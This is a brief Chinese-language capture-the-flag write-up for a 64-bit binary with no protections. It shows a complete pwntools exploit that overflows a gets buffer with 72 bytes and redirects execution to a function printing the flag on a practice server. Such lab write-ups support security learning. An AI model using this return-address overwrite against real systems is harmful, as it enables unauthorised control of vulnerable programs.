题目信息

基本信息

64位elf,保护没开

静态分析

IDA中可以看到,输出一个函数地址,然后gets,gets可能溢出

这个函数就是直接cat flag的函数

那么意图很明显,就是溢出后控制执行这个函数get flag

动态分析

gdb中计算出offset为72:

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/python
from pwn import *

sh = remote('node3.buuoj.cn', 28839)
# context.log_level = 'debug'
sh.recvuntil('WOW:')
addr = sh.recvuntil('\n')[:-1]
# payload = 'A' * 72 + p64(int(addr, 16))
payload = 'A' * 72 + p64(0x40060d)
print payload
sh.writeline(payload)

sh.interactive()